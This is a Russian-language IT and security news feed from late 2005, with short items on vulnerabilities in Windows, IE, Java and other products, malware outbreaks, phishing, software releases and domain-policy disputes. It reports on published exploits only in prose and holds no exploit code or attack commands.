4/12/2005 10:37 Порнографический домен .xxx решили пока не запускать
Вопрос о целесообразности запуска порнографического домена верхнего уровня .xxx вновь отложен. Ожидалось, что на днях всемирный интернет-координатор ICANN рассмотрит эту проблему и вынесет какое-либо решение, однако, по данным BBC News, в организации заявили, что снова откладывают решение на определенный срок. Как ранее сообщалось, в начале минувшего лета ICANN одобрила идею введения этого домена, которую инициативная группа по его организации лоббировала несколько лет. Решение ICANN было подвергнуто резкой критике со стороны различных общественных групп, и организация пообещала пересмотреть этот вопрос, остановив начатую процедуру учреждения домена. Этому способствовала и точка зрения Министерства торговли США, которое выразило "озабоченность" происходящим. Как известно, это министерство обладает правом вето на решения ICANN. По словам почетного председателя ICANN Винтона Серфа (Vinton Cerf), участники обсуждений пока не смогли выработать итогового решения, необходимы дополнительные консультации, поэтому запуск домена пока вестись не будет.
Подробности

3/12/2005 13:37 Установка и настройка Honeypot
На сайте InfoSec Writers опубликован документ под названием "How to build and use a Honeypot", автором которого является Ralph Edward Sutton (младший). Как следует из названия, основное назначение статьи - дать базовые навыки в установке и настройке того, что называется "Honeypot" ("бочонок с мёдом" - самы близкий перевод). Эта технология предназначена для изучения техник, применяемых для взлома сайтов хакерами. Также может быть использована для изучения техник, применяемых спамерами для обхода различных систем фильтрации. В качестве примера автор строит систему на базе ОС Windows 2003 Professional. В качестве ПО построения выбран honeybot.
Статья в PDF-формате

3/12/2005 12:32 Mail.ru: зафиксирован серьезный сбой в работе системы
29 ноября 2005 года в почтовой системе Mail.ru произошёл сбой, в результате которого тысячи пользователей не получили корреспонденцию, а предназначавшиеся им электронные письма ушли на другие адреса. Mail.ru является крупнейшей российской бесплатной почтовой системой, которой пользуются миллионы. Почтовый сервис Mail.ru используют как частные лица, так и компании для ведения деловой корреспонденции. Кроме того, электронный почтовый ящик иногда является объектом регистрации в других сервисах интернета, например, в форумах, онлайновых магазинах и пр. «Последствия инцидента могут быть весьма плачевными, — говорит Денис Зенкин, директор по маркетингу компании InfoWatch. — В случае „перемешивания“ писем, конфиденциальная информация могла попасть в „неправильные руки“, что повлечет за собой разнообразные скандалы, начиная с выяснения отношений с неверным супругом и заканчивая взломами онлайновых магазинов». По мнению экспертов, инцидент может нанести удар только по имиджу Mail.ru. Это бесплатная служба электронной корреспонденции и, если глубже вчитаться в пользовательское соглашение, оно не гарантирует качественного сервиса по точной доставке писем адресатам. По сути дела, пользователи любых похожих служб каждый день отправляют электронные сообщения на свой страх и риск. В Mail.ru давать комментарии по поводу произошедшего отказались.
CNews

3/12/2005 12:10 Выход Apache 2.2.0
Apache Foundation представила новую стабильную версию web-сервера Apache — 2.2.0. Нововведений в Apache 2.2.0 множество, главные из которых сводятся к следующим: появился новый механизм фильтрации, улучшена работа с кэшем, добавлен механизм AJP Proxy, появилась возможность балансировки нагрузки на сервер, изменена система останова сервера, добавлена поддержка больших файлов и событий MPM, кроме того, были переработаны механизмы аутентификации и авторизации.
Подробнее

3/12/2005 11:49 Миллиард «рождественских подарков» от спамеров
По расчетам компании MailFrontier, в период рождественских праздников на пользователей может обрушиться миллиард спамовых и мошеннических писем, сообщает сайт vnunet.com. В период рождественских праздников пользователи озабочены поисками подарков, а спамеры и мошенники – новых жертв. Предпраздничная лихорадка сулит им большие возможности, и упускать свой шанс они не намерены. Объемы спама в этот период времени традиционно возрастают. В 2004 году на Рождество спамерами были разосланы 750 миллионов сообщений, в том числе мошеннических. Предполагается, что в этом году масштабы бедствия возрастут: по расчетам компании MailFrontier, на пользователей может обрушиться миллиард спамовых и мошеннических писем. Фишеры готовят свои «подарки» потенциальным жертвам и изобретают новые приемы, чтобы заполучить от них нужную информацию. MailFrontier предупреждает об одной из таких новинок: пользователь получает сообщение о том, что ему необходимо подтвердить покупку или отказаться от заказа, на который якобы выставлен счет. Разумеется, в обоих случаях следует ввести информацию о своей кредитной карте.
Более подробно

3/12/2005 11:37 Microsoft может выпустить внеочередной патч для IE
Во Всемирной сети появилась очередная вредоносная программа, получившая название Win32/Delf.DH. Троян Win32/Delf.DH проникает на компьютер через одну из дыр в браузере Internet Explorer. Уязвимость, о которой идет речь, была обнаружена еще в мае нынешнего года и тогда не получила высокого рейтинга опасности, поскольку, по имевшейся информации, могла использоваться лишь с целью аварийного завершения работы браузера. Однако недавно в интернете появился эксплойт для данной дыры, при помощи которого можно не только спровоцировать сбой в работе IE, но и выполнить на удаленном компьютере произвольный вредоносный код. Датская компания Secunia сразу же подняла статус дыры до критически опасной, а ряд экспертов высказались о скором появлении вирусов, основанных на эксплойте. На создание трояна, использующего брешь, у злоумышленников ушло менее недели. Win32/Delf.DH проникает на компьютер при просмотре пользователем вредоносного веб-сайта в Internet Explorer и после активации незаметно загружает дополнительные шпионские модули. Заражению подвержены даже полностью пропатченные компьютеры с операционной системой Windows ХР и вторым сервис-паком. Не исключено, что появление трояна вынудит Microsoft выпустить заплатку для дыры вне ежемесячного графика, сообщает InformationWeek.
Более подробно

3/12/2005 10:55 Начался новый этап тестирования замены Microsoft Hotmail
Софтверный гигант выпустил новую бета-версию Windows Live Mail, пытаясь наделить веб-почту возможностями Outlook. Хотя опытная версия, предоставляемая ограниченному числу тестеров, вышла под знаменем Windows Live, поднятым в начале ноября, на самом деле это часть давних усилий Microsoft по модернизации Hotmail, ее бесплатной почтовой службы на базе Web. По словам руководителя проекта из отделения Microsoft MSN Брук Ричардсон, Microsoft создает Windows Live Mail с нуля, оставляя Hotmail и 125 млн ее пользователей в отдельной системе. Цель новой службы — повысить производительность электронной почты и внести в нее функции, присутствующие в программе Outlook. Проект базируется на AJAX. Пакет Windows Live нацелен на создание персональных инструментов на базе интернета, таких как блоггинг и интернет-пейджинг, а также службы e-mail. Продукты будут поддерживаться рекламой — Microsoft намерена конкурировать с такими веб-гигантами, как Google и Yahoo. Большинству потенциальных пользователей придется подождать до будущего года, пока Microsoft отладит новую службу. В июле компания пригласила тысячи бета-тестеров, а в ближайшие месяцы планирует открыть опытную версию для миллионов пользователей, сказала Ричардсон. В новой бета-версии около дюжины новых функций. Среди них инструмент для проверки орфографии, подчеркивающий ошибки по мере составления сообщений и предлагающий правильный вариант, если кликнуть на слове правой кнопкой мыши. Компания модифицировала также средства безопасности, чтобы привлечь больше внимания к письмам, которые могут быть связаны с мошенническими схемами типа фишинга. Программа делит все входящие сообщения на три уровня безопасности: «с известным отправителем», «с неизвестным отправителем» и «небезопасные».
Сайт проекта

3/12/2005 10:34 Немецкая полиция захватила 5 серверов с 6 терабайтами контрафакта
Полиция Германии пресекла деятельность группы цифровых пиратов, содержавшей онлайновый ресурс с 6 терабайтами контрафактной медиапродукции (6 терабайт - это 6144 гигабайта), сообщает интернет-издание The Register. Нелегальные копии компьютерных программ и фильмов содержались на пяти серверах, которые были изъяты полицейскими в городе Кобург на севере Баварии. Был также задержан по меньшей мере один из хозяев предприятия. Серверы функционировали около года и предоставляли желающим доступ к своему архиву за деньги. Установлено, что пользовались услугами пиратов около 1200 человек. Расследование было начато по по инициативе немецкого антипиратского объединения правообладателей GVU, по запросу которого полиция провела ряд обысков в разных местах Германии. По данным GVU, сейчас в Европе действует сеть из 50 пиратских групп (так называемых "release groups"), которые занимаются взломом защиты медиапродукции и изготовлением ее контрафактных копий. Такие копии распространяются через аналогичные серверы по всему миру, впоследствии файлы обычно расходятся по p2p-сетям и издаются на пиратских дисках.
Источник

2/12/2005 15:51 Китай установит личности всех владельцев сотовых телефонов
Китай обяжет всех пользователей мобильных телефонов, оплачивающих связь с помощью карт предоплаты, зарегистрироваться у своих сотовых операторов, сообщает в пятницу агентство Синьхуа. Такая мера связана с намерением властей подтвердить личность пользователя каждого мобильного телефона в стране, чтобы предотвратить нелегальное использование связи, в том числе для передачи информации (контента), запрещенной по политическим или этическим соображениям. В настоящее время китайцы, становясь пользователями сотовой связи, могут на выбор либо заключить контракт и пользоваться ей в кредит, предоставив удостоверяющие личность документы, либо купить SIM-карту без заключения контракта. Однако уже до 2006 года документы будет необходимо предъявить и в последнем случае. Те же, кто купил SIM-карту ранее, под угрозой отключения должны будут подтвердить свою личность в течение шести месяцев.
Подробности

2/12/2005 15:32 Очередная уязвимость в ОС Windows
Некто Nima Salehi из Ashiyane Digital Securty Team сообщает об очередной уязвимости в ОС Windows. Как утверждает автор, суть уязвимости сводится к тому, что, если один из процессов открывается при помощи функции OpenProcess и при этом будет использована функция CreateRemoteThread(Process,0,0,x,0,0,0) - сам процесс аварийно завершится. Как утвеждает опять же сам автор - эта "особенность" может быть использована для обхода файрволлов и антивирусов. Выпущен эксплоит.
Подробности

2/12/2005 15:16 Обнародован план разработки GPL 3
Обновленная версия лицензии свободного ПО будет готова меньше чем через полтора года и может решить такие проблемы, как DRM, патентование ПО и интернационализация. Организация Free Software Foundation опубликовала график создания следующей версии GPL, наиболее широко используемой лицензии свободного ПО. Первый проект GPL 3 будет обнародован на конференции, которая состоится 16-17 января 2006 года. Второй и третий проекты лицензии планируется выпустить летом и осенью того же года. Окончательная версия GPL 3 будет опубликована весной 2007 года. Сообществу свободного ПО предлагается присылать замечания по каждой версии проекта лицензии. FSF выпустила также документ с описанием процесса и рекомендаций по внесению изменений в GPL. Текущая версия GPL 2 корректируется с тем, чтобы принять во внимание изменения, произошедшие в софтверной индустрии с момента выпуска этой версии в 1991 году. «Будут учтены новые формы использования и современные международные требования коммерческих и некоммерческих пользователей», — говорится в заявлении по GPL 3 основателя FSF Ричарда Столлмана.
Подробности

2/12/2005 11:19 Кибер-сквоттер захватил подкастинговый ресурс
Эрик Маркус, хозяин сайта vegan.com, обнаружил, что его RSS-лента с подкастами "Erik's Diner" была загадочным образом захвачена. Как говорит Маркус, кибер-сквоттер требует от него заплатить неопредёленную сумму денег или принять особые условия. Чтобы разобраться с новой формой интернет-вымогательства Маркус обратился в суд, где ему уже согласился помогать один из юристов, специализирующийся на защите прав интеллектуальной собственности. За последние несколько лет количество слушателей каждого шоу Эрика увеличилось со ста до полутора тысяч человек. Совсем недавно Yahoo добавила вход на его сайт в бета-версии сервиса Podcasts.yahoo.com. На странице "Erik's Diner" есть RSS, но принадлежит он не Vegan.com, а сайту под названием Podkeyword.com. Как Маркус рассказывал Internet News, он в течение трёх месяцев писал в Yahoo с просьбой разъяснить ситуацию, однако в компании ему так ничего и не ответили и исправить RSS не смогли. Маркус сразу отправил Podkeyword письмо с предложением "уладить проблему, пока все дело плохо не закончилось", после чего количество слушателей Маркуса значительно сократилось, а на сервисе iTunes также появился адрес Podkeyword. Маркус связался с Apple, но проблема также пока не устранена. Что касается Podkeyword, то захватчик обещает восстановить подкаст Маркуса, только если тот заплатит деньги или согласится на особые условия.
Источник

2/12/2005 10:12 Популярная голосовая сеть Skype представила видеотелефон
Известная коммуникационная компания Skype объявила о выходе новой версии своего ПО с индексом 2.0, сообщает Associated Press. Главной особенностью нового продукта называется возможность совершать видеозвонки. Как известно, Skype около года назад завоевала широкую популярность, разработав и внедрив протокол обмена по Интернету в режиме реального времени звуковыми данными в сжатом виде, пригодный для массового использования. Протокол и созданная на его базе система интернет-телефонии стали применяться многими пользователями Интернета как "голосовая" альтернатива текстовым интернет-пейджерам наподобие ICQ. Впоследствии Skype добавила к своему ПО возможность за деньги совершать звонки с компьютеров на обычные телефоны, и наоборот. За последнее время технологии голосовой коммуникации и видеокоммуникации были также добавлены в популярные сети обмена текстовыми сообщениями (однако пока не получили широкого распространения), компания Google представила собственную сеть Google Talk, где функция телефонии была сразу реализована. В сентябре Skype, ставшая крупнейшей мировой VoIP-компанией, была куплена аукционным гигантом eBay за 2,6 миллиарда долларов. Для пользования Skype 2 необходима вебкамера. Как отмечает Associated Press, вебкамеры сейчас есть у многих пользователей, они встроены в некоторые модели современных ноутбуков, тем не менее, Skype объявила возможности заказать у нее в рамках партнерской программы вебкамеры фирм Logitech и Creative. Также в новой программе реазизована возможность интеграции с популярным органайзером Microsoft Outlook, в адресную книгу которого добавляется возможность соединяться с абонентами по Skype.
Источник

1/12/2005 15:21 Эксплоит уязвимости Internet Explorer
Winny Thomas из Индии выпустил эксплоит уязвимости, обнаруженной в ОС Windows и связанной с некоректной работой библиотеки GDI. Хотфикс уязвимости преложен в бюллетене MS05-053, выпущенном в прошлом месяце. Как пишет сам автор, эксплоит позволяет сгенерировать метафайл (.wmf), который, будучи просмотрен в IE вызывает 100% загрузку процессора. Работа тестировалась на Windows 2000 server SP4.
Исходный код

1/12/2005 13:38 Sun закрыла пять уязвимостей в Java
Sun Microsystems исправила пять ошибок в своих реализациях языка Java для платформ Linux, Solaris и Windows. Специалисты Secunia присвоили ошибкам статус «высоко критических», то есть, позволяющих выполнять произвольный код на удаленном компьютере. Все уязвимости касаются виртуальных машин Java — Java Runtime Environment, выполняющих код, написанный на этом языке. Хакер получает полный доступ ко всем файлам на чтение, запись и выполнение. Аналогичные ошибки также обнаружены в специальных версиях Java — Sun Java Software Development Kit (SDK) и Java Development Kit (JDK). Случаев эксплуатации пока не обнаружено, утверждают в Sun. Три ошибки располагаются в компонентах прикладного интерфейса программирования (библиотеках) Java Runtime Environment, одна — в расширениях управления — Java Management Extensions, а место еще одной не конкретизируется. Sun настоятельно рекомендует установить обновления, в частности, JRE 5.0 Update 4, которое было выпущено 23 июня. Следующее, Update 5, вышло в сентябре, но Sun не сообщает, были ли обнаружены в нем проблемы с безопасностью.
Источник

1/12/2005 12:50 Обновление по безопасности Mac OS X
Компания Apple выпустила очередное обновление по безопасности для выпускаемых и поддерживаемых ей ОС. Прдназначено для: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3. Обновлению присвоен код APPLE-SA-2005-11-29. Список обновляемого ПО очень обширен и включает в себя: Apache2, apache_mod_ssl, CoreFoundation, curl, iodbcadmintool, OpenSSL и др. Также выпущены обновления применяемого ПО в части улучшения надёжности функционирования. В частности, во включённом в Mac OS X браузере Safari улучшена работа с кодами безопасности кредитных карт.
Подробности

1/12/2005 12:30 Уязвимость в библиотеке Panda Antivirus
Alex Wheeler из remote.com обнаружил уязвимость в библиотеке антивирусного ПО, выпускаемого компанией Panda. Ошибка присутствует в библиотеке pskcmp.dll и проявляется во время обработки ZOO-архивов. Удаленный пользователь может создать специально сформированный ZOO-архив, вызвать переполнение динамической памяти (кучи) и выполнить произвольный код на целевой системе. Так как уязвимость обнаружена в самой библиотеке, она также присутствует во многих программных решениях компании, связанных с антивирусной защитой. Так как на настоящий момент патча не существует, рекомендуется отфильтровывать ZOO-архивы при помощи почтовых или прокси-фильтров.
Описание в формате PDF

1/12/2005 12:11 Уязвимость в Opera
Marc Schoenefeld сообщает о наличии уязимости в браузере Opera. Уязвимость связана с ошибкой в программе JNI при обработке класса com.opera.JSObject. Автором был создан довольно простой java-апплет, запуск которого приводит к аварийному завершению программы. Уязвимость присутствует в Windows-версии (возможно, и в Linux) Opera версии 8.50. Рекомендуется обновиться до версии 8.51.
Описание

1/12/2005 11:58 WinBinder позволяет создавать Windows-приложения на PHP
В Интернет появились расширения WinBinder для скриптового языка программирования PHP. Как сообщается, посредством WinBinder на РНР можно создавать Windows-приложения с традиционным интерфейсом. Среди основных особенностей WinBinder можно упомянуть непосредственное взаимодействие с программными интерфейсами операционных систем Microsoft Windows, небольшой размер конечных файлов приложений, обширную базу всевозможных PHP-функций, возможность объектно-ориентированного и процедурного программирования, а также удобство использования. Правда, для работы Windows-приложений, созданных с использованием WinBinder, требуется наличие на компьютере РНР. Впрочем, данный недостаток может быть легко устранен путем инсталляции минимального РНР-пакета, предлагаемого разработчиками.
Дополнительная информация

1/12/2005 11:24 В прошедшем месяце больше всех червей свирепствовал Sober
В ноябрьском трафике электронных писем-носителей вирусов преобладали сообщения, якобы исходящие от ФБР, ЦРУ или Парис Хилтон. В эти сообщения вложен новый вариант червя Sober, заражающего компьютер получателя, открывшего вложение. Червь пытается отключить антивирусные программы и отправляет собственные копии по всем адресам e-mail, которые найдет на жестком диске. Червь Sober составляет почти 43% всех вирусов, о которых сообщила в ноябре британская антивирусная фирма Sophos. В момент пика эпидемии он содержался в каждом 13-ом письме, передаваемом через интернет. Наиболее широко распространившийся вариант с момента первого появления червя Sober около двух лет назад, новый член семейства угрожал перегрузкой серверов e-mail и замедлением доставки сообщений, отмечает Sophos. Другая секьюрити-фирма, Postini, оценивает последнюю эпидемию Sober как вдвое превышающую по интенсивности предыдущую атаку. В зараженных письмах содержатся разные сообщения. Одни якобы исходят от ФБР или ЦРУ и предупреждают получателей, что те посетили нелегальные веб-сайты и должны ответить на вопросы, содержащиеся в приложении. Другие обещают видеоклипы с участием знаменитостей Парис Хилтон и Николь Ричи, тогда как немецкая версия ссылается на демонстрируемый в Германии вариант телешоу «Кто хочет стать миллионером?».
Подробности

1/12/2005 10:53 Вышел Chip Special Linux Осень/2005
В продаже появился третий номер русскогоязычного журнала о Linux - Chip Special Linux. Как всегда 100 интересных страниц, почти без рекламы, в каждом номере диск. Вот лишь несколько тем: Создание и настройка домашнего музыкального центра; Диалог с мобильным спутником. Как подружить Linux и КПК на базе Palm OS; Настройка DVB-приемника для просмотра спутникового телевидения; Возможна ли жизнь без Apache? Обзор легковесных веб-серверов; Великая огненная стена. Обеспечение сетевой безопасности компьютера с помощью Firestarter.
О журнале

1/12/2005 10:34 Опасность ошибок Perl недооценивалась?
Уязвимости в приложениях, написанных на языке Perl, могут приводить не только к атакам на отказ в обслуживании, как считалось до сих пор, но и вызвать гораздо более серьезные проблемы. Во вторник компания Dyad Security предупредила о так называемой «уязвимости форматирования строки» в Webmin, утилите веб-администрирования, написанной на языке Perl. Используя эту ошибку «нового класса», злоумышленник может полностью завладеть сервером, на котором исполняется уязвимое ПО, говорится в предупреждении. «В случае успешного исполнения кода при стандартной конфигурации такая атака может привести к полному овладению компьютером на уровне root». Об уязвимостях форматирования строки известно давно, но прежде эксперты считали, что подобные ошибки в приложениях, написанных на Perl, нельзя использовать для дистанционного исполнения кода на целевой системе. Такие атаки считались возможными только в том случае, если приложение написано на более низкоуровневом языке программирования, таком как С. «Возможно, это первая из уязвимостей форматирования строки нового типа, — говорит старший менеджер Symantec Security Response Оливер Фридрихс. — Раньше считалось, что таким способом можно вызвать только атаку на отказ в обслуживании. Теперь хакеры, конечно же, начнут пристально изучать их».
Подробности

1/12/2005 10:10 Интернет-мошенники паразитируют на сайте американской налоговой службы
Антивирусная компания Sophos сообщила о необычном "фишерском" письме, рассылаемом пользователям Интернета с помощью спамерских технологий. Как известно, "фишинг" (phishing) - это мошенническая технология выманивания обманным путем у пользователей платежных и банковских онлайновых систем данных для доступа к их аккаунтам. Обычно такие письма содержат просьбу подтвердить логин и пароль, посланную якобы от имени администрации сервиса. Далее следуют ссылки на фальшивые сайты, дизайн которых повторяет дизайн того или иного сервиса. При введении пользователем своих идентификационных данных они попадают к мошенникам, которые немедленно снимают с управляемого через Интернет счета все деньги. Обнаруженное фирмой Sophos письмо действует по несколько иной, уникальной, технологии, в основе которой лежит недочет в программном обеспечении сайта Службы внутренних доходов (IRS) - налогового ведомства США. Недочет позволяет перенаправить посетителя на произвольный адрес в Интернете при обращении к определенному "скрипту", работающему на сайте ведомства IRS.gov. В письме содержится сообщение о том, что IRS в результате неких перерасчетов оказалась должна получателю крупную сумму денег. Для того, чтобы ее получить, нужно зайти по приведенному адресу и ввести свои личные данные, в частности, номер соцобеспечения. Адрес начинается с "легального" доменного имени IRS.gov, за которым следует ряд "технически запутанных" параметров - именно они и приводят к тому, что с официального IRS.gov пользователь переходит на хакерский сайт, маскирующийся под официальный. Там и содержится форма для введения личных данных - именно их похищение и является целью мошенников. Такие данные имеют хождение на мировом хакерском рынке и их можно продавать за деньги.
Источник

30/11/2005 13:52 Зараженный флэш
На днях появились сообщения о продаже одной из японских компаний зараженных троянцем переносных жестких дисков, сообщает "Лаборатория Касперского". Троянец, детектирующийся антивирусом как Backdoor.Win32.Tompai, предоставляет хакеру возможность доступа к пораженным машинам. Это не первый подобный случай — в декабре 2004 года Роул собственноручно обнаружил вредоносную программу на жестком диске купленного им MP3-плеера от iRiver. Возможно, мы вступаем в эру, когда фотографам придется проверять свои флэш-карты антивирусом, прежде чем их использовать?
"ЛК"

30/11/2005 13:36 Цена «успеха»
Питер Франсис-Макре, которого в Великобритании называют «самым успешным» спамером страны, ближайшие 6 лет проведет в тюрьме, сообщает сайт News.com. 23-летний Питер Франсис-Макре (Peter Francis-Macrae) рассылал спамовые письма с предложением регистрации на домене .eu. Кроме того, мишенями его мошенничества стали компании, которым Франсис-Макре посылал сообщения о том, что срок регистрации их доменов заканчивается, и необходимо срочно выложить определенную сумму, чтобы не потерять доменные имена. На удочку мошенника попались тысячи людей, а ушлый спамер, как утверждается, нажил 2,8 миллионов долларов, не выходя из спальни, откуда он осуществлял свои рассылки. Однако Франсис-Макре не ограничился массовыми рассылками спама и мошенничеством. Он признан виновным в угрозах разрушения имущества, скрытии нелегального дохода, нечестной торговле, шантаже и: угрозах убийства. Когда компания Nominet UK, владелец прав на домен .uk, опубликовала на своем сайте предупреждение о мошеннической деятельности спамера, Франсис-Макре позвонил в Nominet с угрозой «напустить» на серверы компании 200 зомби-машин и продолжать атаку до тех пор, пока предупреждение не будет снято. Кроме того, зарвавшийся спамер угрожал следователям и офицерам полиции, которые участвовали в расследовании, — уже не DoS-атакой, а бомбой. Мстительному спамеру придется ответить и за рассылку 2003 года, в результате которой были перегружены телефонные линии полиции Кембриджа. Тогда Франсис-Макре разослал сообщение, в котором получателей информировали о том, что им якобы могут выставить счет на сумму в $700, если они не позвонят по указанным номерам телефона и не дадут необходимых разъяснений. Номера телефонов, приведенные в письме, принадлежали полиции Кембриджа.
Подробности

30/11/2005 12:54 В Sun JRE нашли критические уязвимости
Обнаружены уязвимости в виртуальной машине Sun Java Runtime Environment, которые позволяют удаленному пользователю скомпрометировать целевую систему. Неизвестная ошибка позволяет недоверенному апплету получить доступ на чтение, запись и выполнение приложений на системе. Уязвимость существует в JDK/JRE 5.0 Update 3 и более ранних версиях на платформах Windows, Solaris и Linux. Уязвимость обнаружена из-за ошибки в использовании reflection API. Недоверенный апплет может получить доступ на чтение, запись и выполнение приложений на системе. Уязвимость существует в следующих продуктах на платформах Windows, Solaris и Linux: SDK and JRE 1.3.1_15 и более ранние версии; SDK and JRE 1.4.2_08 и более ранние версии; JDK and JRE 5.0 Update 3 и более ранние версии. Ошибка в реализации JMX (Java Management Extensions), входящим в состав JRE, может позволить злоумышленнику просмотреть и записать произвольные файлы, а, также, выполнить произвольные приложения на системе. Уязвимость обнаружена в JDK/JRE 5.0 Update 3 и более ранних версиях на платформах Windows, Solaris и Linux. «Дырам» присвоен рейтинг опасности «критическая». Уязвимы Sun Java SDK 1.4.x; Sun Java SDK 1.3.x; Sun Java JRE 1.5.x / 5.x; Sun Java JRE 1.4.x; Sun Java JRE 1.3.x; Sun Java JDK 1.5.x. Для использования уязвимости нет эксплойта.
Источник

30/11/2005 12:32 Microsoft предлагает всем испытать свое новое ПО безопасности
Как и было обещано, Microsoft приступила к открытому тестированию своего ПО безопасности OneCare Live, сделав его бета-версию общедоступной. OneCare знаменует собой давно ожидаемый выход Microsoft на рынок потребительских антивирусов, где сейчас доминируют специализированные фирмы вроде Symantec, McAfee и Trend Micro. Два года назад Microsoft объявила о своем намерении предложить антивирусные продукты и приобрела румынского разработчика антивирусного ПО GeCad Software. В мае Microsoft объявила о планах в отношении OneCare. С июля продукт тестируют избранные тестеры, а недавно Microsoft добавила в бета-версию новые функции. Во вторник представитель компании сообщил, что английская версия OneCare для Windows XP с Service Pack 2 доступна для всех желающих. Выход финальной версии ожидается в 2006 году. OneCare предназначена для индивидуальных пользователей и сочетает антишпионское ПО — которое Microsoft тоже открыто тестирует — с антивирусом, брандмауэром и несколькими инструментами настройки. Цены на OneCare Microsoft еще не объявила, но сообщила, что финальный пакет будет распространяться по подписке. Microsoft нацелилась и на рынок корпоративных средств защиты. К концу года она планирует выпустить первую тестовую версию нового продукта Microsoft Client Protection для защиты рабочих станций, ноутбуков и серверов.
Сайт ПО

30/11/2005 12:03 Музыкальные CD с защитой не нравятся ни продавцам, ни покупателям
Музыкальные компакт-диски с внедренной защитой от копирования уже давно вызывают резко отрицательные отзывы со стороны потребителей. Мало того, что легально приобретённую музыку в ряде случаев невозможно нормально скопировать на компьютер, так её еще не удается загрузить в память портативных плееров, если производители внедрили соответствующие ограничения. Например, CD с защитой от EMI и Sony BMG совместимы только с Windows Media Player (а не с iTunes), что не позволяет переписать трэки в память iPod. Естественно, такая ситуация вряд ли может кому-то понравиться. Впрочем, защищенными CD недовольны не только потребители, сообщает eCommerceTimes. Многие владельцы музыкальных магазинов также не хотели бы видеть подобный товар на своих полках, поскольку из-за него зачастую приходится выслушивать жалобы покупателей. Между тем, аналитическая компания Jupiter Research отмечает, что загрузки музыкальных композиций из пиринговых сетей втрое превышают объём продаж файлов в онлайновых магазинах. Наибольшей популярностью Р2Р-службы пользуются среди молодежи.
Источник

30/11/2005 11:22 Опубликован код эксплойта для Windows
В вебе появился эксплойт, использующий проблему Windows, исправление которой у некоторых вызвало трудности. Обнародованный в эти выходные код выводит из строя уязвимые компьютеры, используя «критическую» ошибку Windows, о которой сообщалось в октябре. Баг находится в компоненте Windows для обработки транзакций, называемом Microsoft Distributed Transaction Coordinator (MSDTC). Microsoft описывает его в бюллетене MS05-051. «Первое исследование этого эксплойта подтвердило, что его успешное использование позволяет организовать атаку на отказ в обслуживании… и дистанционное управление кодом», — говорится в заявлении представителя Microsoft. Эта компания утверждает, что пользователи, установившие патч MS05-051, надежно защищены. Патч доступен с 11 октября, однако были сообщения о проблемах, возникавших при его установке. Это не первый эксплойт для ошибки MSDTC, но в интернете такие эксплойты еще не публиковались. Первый был создан поставщиком ПО безопасности, фирмой Immunity, для пользователей его системы тестирования сетей на возможность проникновения.
Подробности
Эксплоит

30/11/2005 10:54 ICANN и VeriSign обвинили в монопольном сговоре
Всемирная ассоциация разработчиков доменных имен (World Association of Domain Name Developers) - американская организация, объединяющая коммерческие компании, работающие в доменном бизнесе - подала в суд на "интернет-координатора" ICANN и компанию VeriSign, управляющую сейчас доменом .com, самым популярным и доходным доменом Сети. Как ранее сообщалось, между VeriSign и ICANN существуют разногласия по поводу системы SiteFinder - эта система перенаправляла на сайт компании всех, кто набрал несуществующий домен в зоне .com или .net (VeriSign сейчас также управляет и этой зоной по контракту с ICANN). Таким образом сервисы компании получали стабильный приток посетителей, но это вызвало резко негативную реакцию интернет-сообщества и ICANN, которые обвинили VeriSign в нечестной бизнес-практике. Работа SiteFinder была остановлена по требованию ICANN, однако впоследствии VeriSign подала на нее за это в суд, так как нигде в соглашениях сторон не запрещается организовывать подобные службы, вскоре ICANN подала встречный иск. В октябре стороны договорились об урегулировании разногласий - VeriSign согласилась на вынесение вопроса о SiteFinder на публичное обсуждение, а ICANN пообещала рассмотреть возможность о продлении статуса регистратора зоны .com до 2012 года (срок нынешнего контракта VeriSign заканчивается в 2007 году).
Подробности

30/11/2005 10:05 Mozilla Firefox обновился до версии 1.5
Некоммерческое программистское объединение Mozilla Foundation объявило о выходе новой версии своего популярного интернет-браузера Firefox. Версия носит индекс 1.5 и является принципиально новой реализацией продукта, в чем состоит ее основное отличие от старых обновлений вида 1.0.x. Главные изменения в структуре программы связаны с безопасностью в Интернете и устойчивостью работы в ОС (как известно, браузер поставляется в версиях для всех популярных ОС и на разных языках, в том числе на русском, он бесплатен). Тем не менее, реализован ряд новых функций, например, возможность стереть из "памяти" программы все введенные при работе личные данные. Кроме того, изменен механизм получения обновлений ("заплаток", "патчей") - ранее для этого надо было скачивать полностью дистрибутив новой версии, в версии 1.5 обновления скачиваются и устанавливаются по модульному принципу. Также отмечается, что улучшен механизм блокировки "всплывающих окон" (popups) - в случае с предыдущей версией авторы "всплывающей рекламы" научились эту блокировку обходить.
Источник

29/11/2005 12:55 Опустевшая KaZaa выгоняет последних пиратов
Администрация известной файлообменной сети KaZaa намеревается изменить лежащее в ее основе программное обеспечение для того, чтобы должным образом обеспечить защиту авторских прав. Как ранее сообщалось, в минувшем сентябре австралийский суд обязал управляющую сетью компанию Sharman Networks полностью избавиться от контрафактного содержимого, в противном случае компанию пообещали закрыть по обвинению в нарушении авторских прав. Администрация в начале сентября объявила, что нелегальными копиями файлов (в основном, это музыка и фильмы) отныне в сети обмениваться запрещено. Вместе с тем, оставалось непонятным, как этот запрет будет соблюдаться при условии, что сеть продолжает работу. Суд назначил компании крайний срок до 5 декабря для того, чтобы полностью обеспечить легальность материалов (с помощью специальных идентификаторов, "прикрепляемых" к файлам). Для этого необходимо заменить программную основу сети - Sharman Networks удалось договориться с властями о переносе крайнего срока на февраль, когда будет слушаться апелляционный иск, взамен было обещано введение временной системы фильтрации поисковых запросов, чтобы "отсечь нарушения" через фильтрование имен музыкантов, записи которых не могут легально появиться в KaZaa.
Подробности

29/11/2005 10:37 Выход Galeon 2.0
После почти 4-х лет разработки (вначале трудного этапа совмещения выпуска 1.2.x и полного переписывания кода, а затем длительного тестирования ветки 1.3.x), выпущен первый релиз браузера Galeon 2.0, сообщает opennet.ru. Браузер использует движок Gecko и работает совместно с mozilla 1.7.5+, 1.8a3 или Firefox 1.0.x, 1.5.
Анонс

29/11/2005 10:14 Microsoft назвала Linux антикоммерческой
